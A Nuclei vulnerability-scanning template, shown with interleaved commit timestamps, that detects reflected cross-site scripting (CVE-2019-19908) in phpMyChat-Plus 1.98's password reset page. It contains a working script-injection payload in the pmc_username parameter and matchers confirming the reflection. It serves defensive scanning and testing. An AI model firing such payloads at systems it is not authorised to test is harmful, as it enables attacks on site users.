nuclei-templates/cves/2019/CVE-2019-19908.yaml

30 lines
876 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-19908
2020-04-08 13:04:46 +00:00
info:
name: phpMyChat-Plus XSS
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
2021-03-30 12:10:17 +00:00
description: phpMyChat-Plus 1.98 is vulnerable to reflected XSS via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
reference:
- https://cinzinga.github.io/CVE-2019-19908/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-19908
cwe-id: CWE-79
tags: cve,cve2019,xss,injection,javascript
2020-04-08 13:04:46 +00:00
requests:
- method: GET
path:
2020-04-09 20:21:15 +00:00
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
matchers-condition: and
2020-04-08 13:04:46 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-08 13:20:50 +00:00
- type: word
2020-04-08 13:24:57 +00:00
words:
2020-05-25 07:49:06 +00:00
- "<script>alert(1337)</script>"
2020-04-08 13:04:46 +00:00
part: body